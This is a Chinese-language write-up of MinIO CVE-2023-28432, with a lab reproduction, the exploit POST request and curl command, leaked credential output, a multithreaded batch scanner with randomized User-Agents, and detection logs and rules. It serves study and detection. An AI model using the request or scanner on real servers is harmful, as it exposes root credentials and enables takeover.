简介
MinIO是一个开源对象存储系统。
在其RELEASE.2023-03-20T20-16-18Z版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。
参考链接:
- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
- https://mp.weixin.qq.com/s/GNhQLuzD8up3VcBRIinmgQ
检测日志
HTTP.log
测试复现
漏洞环境
执行如下命令启动一个MinIO集群,其中包含3个以集群模式运行的服务:
docker-compose up -d
集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。
漏洞复现
这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,发送如下数据包即可查看泄露的环境变量:
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
这里采用另外一种方法进行验证:
jackma@linux:~/下载$ curl -XPOST 10.211.55.71:9000/minio/bootstrap/v1/verify
{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}
可见,其中包含MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。使用这个账号密码,即可成功登录管理后台。
批量检测脚本
import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
#app="minio"urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]def get_ua():first_num = random.randint(55, 62)third_num = random.randint(0, 3200)fourth_num = random.randint(0, 140)os_type = ['(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)','(Macintosh; Intel Mac OS X 10_12_6)']chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36','(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])return uaproxies={'http': 'http://127.0.0.1:8080','https': 'https://127.0.0.1:8080'}def wirte_targets(vurl, filename):with open(filename, "a+") as f:f.write(vurl + "\n")#poc
def check_url(url):url=parse.urlparse(url)hostname = url.hostnameurl=url.scheme + '://' + url.netlocvulnurl=url + "/minio/bootstrap/v1/verify"headers = {'User-Agent': get_ua(),"host":hostname,"Content-Type": "application/x-www-form-urlencoded"}data=""try:res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers,data=data ,timeout=5)if res.status_code == 200 and "MinioEn" in res.text:# print(res.text)print("\033[32m[+]{} is vulnerable\033[0m".format(url))wirte_targets(vulnurl,"vuln.txt")else:print("\033[34m[-]{} not vulnerable.\033[0m".format(url))except Exception as e:print("\033[34m[!]{} request false.\033[0m".format(url))pass#多线程
def multithreading(url_list, pools=5):works = []for i in url_list:# works.append((func_params, None))works.append(i)# print(works)pool = threadpool.ThreadPool(pools)reqs = threadpool.makeRequests(check_url, works)[pool.putRequest(req) for req in reqs]pool.wait()if __name__ == '__main__':arg=ArgumentParser(description='check_url By m2')arg.add_argument("-u","--url",help="Target URL; Example:http://ip:port")arg.add_argument("-f","--file",help="Target URL; Example:url.txt")args=arg.parse_args()url=args.urlfilename=args.fileprint("[+]任务开始.....")start=time()if url != None and filename == None:check_url(url)elif url == None and filename != None:for i in open(filename):i=i.replace('\n','')url_list.append(i)multithreading(url_list,10)end=time()print('任务完成,用时%ds.' %(end-start))
测试留痕
HTTP_log
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 10.211.55.71:9000
User-Agent: curl/7.81.0
Accept: */*HTTP/1.1 200 OK
Content-Security-Policy: block-all-mixed-content
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
X-Amz-Id-2: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
X-Amz-Request-Id: 176C8C25765008C9
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Tue, 27 Jun 2023 15:00:52 GMT
Content-Length: 1107
Content-Type: text/plain; charset=utf-8{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}
检测规则/思路
对请求方法和URL、HOST内容进行分析,同时观察返回内容中是否包含MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。
参考推荐
CVE-2023-28432
https://github.com/vulhub/vulhub/blob/6e9b1c1acd60529384a5751ea9de4dae595259c6/minio/CVE-2023-28432/README.zh-cn.md
MinIO信息泄漏分析与复现CVE-2023-28432
https://aq.mk/index.php/archives/142.html
